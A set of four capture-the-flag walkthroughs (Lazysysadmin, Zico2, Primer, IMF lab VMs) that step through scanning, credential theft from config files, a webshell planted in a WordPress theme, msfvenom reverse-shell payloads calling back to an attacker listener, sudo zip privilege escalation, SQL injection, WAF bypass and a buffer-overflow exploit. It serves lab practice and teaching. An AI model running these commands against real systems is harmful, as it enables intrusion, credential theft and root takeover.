Hack the Lazysysadmin VM (CTF Challenge)

Hello friends! Today we are going to take another CTF challenge known as Lazysysadmin. The credit for making this vm machine goes to “Togie Mcdogie” and it is another boot2root challenge where we have to root the server to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.124 but you will have to find your own)

netdiscover

Use nmap for port enumeration.

nmap -sV 192.168.1.124

We find port 139 and port 445 is open, so we use smbclient to look for shared disk.

Smbclient -L 192.168.1.124

After finding the shared drive we use smbclient to access the shared folder.

smbclient \\192.168.1.124\share$

Searching through the files we find wordpress folder. In the wordpress folder, we download the wp-config.php file to find the password and username.

In the wp-config.php file we find the username and password for wordpress login.

Now we use dirb to find the wordpress page, as the default page on the server is not based on wordpress.

dirb http://192.168.1.124

Now after finding the wordpress page we open admin login page. We access the admin dashboard using the username and password we found earlier in the wp-config.php file.

We then create a php payload using msfvenom and replace the 404.php page in themes with the code of our payload.

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.109 lport=4444 -f raw

We set up our listener using metasploit.

msf > use exploit/multi/handler

msf exploit(handler) > set lhost 192.168.1.109

msf exploit(handler) > set lport 4444

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

msf exploit(handler) > run

We then call the 404.php page to start our session. The 404.php page can be found in /wp-content/themes/twentyfifteen/404.php

As soon as our payload is executed we get our reverse shell.

After searching through the files, we didn’t find anything. So we go back to the shared folder and in there we download a file called deets.txt

When we open the file we find password for some user.

We open the /etc/passwd file on the VM to find the name of the users.

When we switch users we are prompted by an error message to use terminal, so we spawn /bin/bash using python.

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py

Then we switch user to togie and use the password we find in deets.txt file

su – togie

We then look into sudoers and find that we have all the privileges of root user so we switch to root.

sudo -l

sudo su

So we switch to root and go into root folder. There we find a file called proof.txt, we open the file and are greeted with a message congratulating for the completion of the CTF challenge.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

Hack the Zico2 VM (CTF Challenge)

Hello friends! Today we are going to take another CTF challenge known as Zico2. The credit for making this vm machine goes to “Rafael” and it is another boot2root challenge, where we have to root the system to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.0.26 but you will have to find our own)

netdiscover

Use nmap for port enumeration.

nmap -sV 192.168.0.26

We find port 80 is open, so we open this ip in our browser.

Browsing through the site we find that, this site is vulnerable to LFI.

We couldn’t find anything special here so we use dirb to find directories.

dirb http://192.168.0.26/

We found an interesting link called dbadmin. We open it in our browser.

When we open this page we find another link; this link leads us to phpliteadmin login page.

We tried the password” admin”, and it granted us access.

We find that this version of phpliteadmin is vulnerable to php code injection.

So we create another database and named it shell.php we use this database to inject php code.

After we inject our code we use LFI to execute our shell. Here we can see that ls command was executed when we execute our shell.

Now we create executable file using msfvenom.

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.0.25 lport=4444 -f elf > /root/Desktop/shell

We move it to /var/www/html/ and then setup our listener on metasploit.

We then use php code injection to upload our file to the server make it executable, and execute the file.

We execute the php code using LFI and get a reverse shell.

After searching through the files we find password for user zico in /home/zico/worpress/wp-config.php

We use this password to login through ssh.

After searching through the files, we take loot at the sudoers and find that we are allowed to use a few commands as root.

Now we move to /tmp folder and find a few files that we had uploaded. We use zip to gain root privilege by executing shell command along with zip.

sudo -u root zip shell.zip shell.py -T -unzip-command=”sh -c /bin/bash

After gaining root privilege we move to root folder. Inside the root folder we find a file called flag.txt when we open the file. We get greeted by a message congratulating for the completion of the challenge.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

Hack the Primer VM (CTF Challenge)

Hello friends! Today we are going to take another CTF challenge known as Primer. The credit for making this vm machine goes to “couchsofa” and it is another boot2root challenge where we have to root the VM to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.115 but you will have to find our own)

netdiscover

Use nmap for port enumeration

nmap -sV  192.168.1.115

We found port 80 is open so we open this ip address in our browser.

We use dirb to list the directories and find robots.txt

dirb http://192.168.1.115/ -w

Inside the robots.txt we find a link to a page.

We open this link, it leads to page that has a story written on it.

We take a look at the source code at the and found another link.

When we open the link, we found a link on the page.

When we open this link, we are prompted for a password.

We capture the request of this page in burpsuite and and send it to repeater. In the response from the server, we find another link.

When we open the link, we find another page that prompts for password.

Now we take a look at the url, it looks like md5 so we removed the first and underscore we find something interesting.

We find that the url are actually prime numbers converted into md5 hashes. We were at the 7 page, and the hash to that is 17. So we convert 19(next prime number) to md5 hash.

To open the it we add “8_” in front of the hash to complete the url. We open it in our browser and find a page.

We take a look at the source code and find another url.

We open it and find a custom made terminal that uses javascript to execute certain commands.

In the ~/usr/falken/ folder we find a hint, when we take a look at the processes we find a command that we need to run.

When we run connect [email protected] It prompts for password. We get a hint from the log files that the password might be related to Joshua. In the logs we find that his date of birth i 6th august 1984. We use cupp to create a dictionary file.

We use burpsuite to bruteforce the password, we find that joshua1984 is the password.

When we login, we find a page again with terminal.

We check the files and find a few log files that are encoded. We use the decode command provided by the terminal to decode the files.

There we find our next clue, we googled trivial zero and found it was discovered by Riemann. We use cupp to create a dictionary with the given information.

We use burpsuite to bruteforce the password and find it to be Riemann.

When we login we are again prompted with another terminal.

When we look through the files we find the md5 encoded string for the usernames. We check for processes and again find a command.

When we crack the md5 password, we find that these are password for the respective username.

When we crack the md5 password, we find that these are password for the respective username.

When we login, we are again prompted with another terminal.

Looking through the files we find username, password and hostname.

We use these to login and find a page greeting us the end of the challenge.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

Hack the IMF VM (CTF Challenge)

Hello friends! Today we are going to take another CTF challenge known as IMF. The credit for making this vm machine goes to “Geckom” and it is another CTF challenge where we have to find 6 flags to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.0.25 but you will have to find your own)

netdiscover

Use nmap for port enumeration

nmap -sV  192.168.0.25

We find port 80 is open, so we open the ip address in our browser.

We take a look at our source code and found a few javascript files that look like base64 encoded.

We open them and find nothing interesting but when we join their name and decode them we find our 2nd flag.

Inside the flag we find another base64 encode string, decoding it we find a string called imfadministrator.

We take a look around the website and in the source code of contact.php page we find our 1st flag.

Flag 1 contains a base64 encoded string decoding it we find a string called allthefiles.

We open allthefiles and imfadministrator on the browser. We find that imfadministrator is a directory that leads to a login page.

In the contact.php page we found a few email addresses so we use cewl to make a dictionary.

We use burpsuite to launch a dictionary attack. We select the position and change the password from string to array.

Now we find the third flag in our response, when the login is successful.

Now that we can access the page we see that the page might be vulnerable to sql injection.

Using burpsuite we capture the request of this page and save it in a text file.

We use sqlmap to dump the database.

sqlmap -r /root/Desktop/imf.txt –dbs –batch –dump-all

We find the name of the pages along with another page called tutorial-incomplete. We open it on our browser and find a page with QR-code inside an image.

When we decode the QR-code we our 4th flag.

Inside our flag we find a base64 encoded string, when we decode it we find a string called uploadr942.php         

We open it on our browser and find a page to upload a file.

Now while uploading a shell we find that it is protected from WAF, so we create a custom shell and save it as GIF file to bypass the WAF.

Now we upload the file and check the response from the server to find where our file is uploaded.

We find server sends a string in a comment, we find our file is in uploads folder and the comment in the response sent by server is the name of our file.

After finding our shell, we find 5th flag. Now we use web_delivery to take reverse shell using metasploit.

We setup our metasploit for web delivery and execute the command on our shell.

Now that we have the reverse shell we take a look inside 5th flag

We find a base64 encode string when we decode it we find a string agentservices.

We check the connections of our server using netstat

netstat -antp

We found a service running on port 7788, we use curl to find what the server is running on port 7788.

curl localhost:7788

We find a service called agent is running so we find the location of agent using which command

which agent

When we move into the folder we found a file called access_codes, we open it and find a few numbers. It looks like a sequence for port knock.

So we knock the server and find that port 7788 opened.

Knock 192.168.0.25 7482 8279 9467

Now we download agent program file to our system for reverse engineering.

download agent /root/Desktop

Now we reverse engineer the file to find an exploit. First we disassemble main function.

gdb -q agent

disassemble main

We find that at memory address 80486ba, string compare function takes place so we add a break point there.

We break the program at 80486ba, and run the program. After running the programs, we look at the memory locations associated with the program.

break *0x80486ba

info registers

We look inside four halfwords of memory above starck pointer

x/4xw 0xffffd340

In the memory address 804c070 we found the password to access the program.

x/s 0x0804c070

Now we access the program from the server using netcat and find that the string can give us access to the program

netcat 192.168.0.25 7788

Now we create an exploit for this program, first we create a shellcode for msfvenom payload.

msfvenom –p linux/x86/meterpreter/reverse_tcp lhost=192.168.0.15 lport=4444 –f python –b \x00\xa0\x0d

Now we create our exploit using python. We manually fuzz the memory location inside our exploit.

We setup our handler on metesploit and execute the shell.

msf > use exploit/multi/handler

msf exploit (handler) > set payload linux/x86/meterpreter/reverse_shell

msf exploit (handler) > set lhost 192.168.0.15

msf exploit (handler) > set lport 4444

msf exploit (handler) > run

now we check for sessions and take the interactive shell

msf exploit (handler) > sessions

msf exploit (handler) > sessions -i 3

Now we take shell check our privileges, we find that we are root. When we move inside the /root/ folder we find our 6th and final flag.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

Related Posts Plugin for WordPress, Blogger...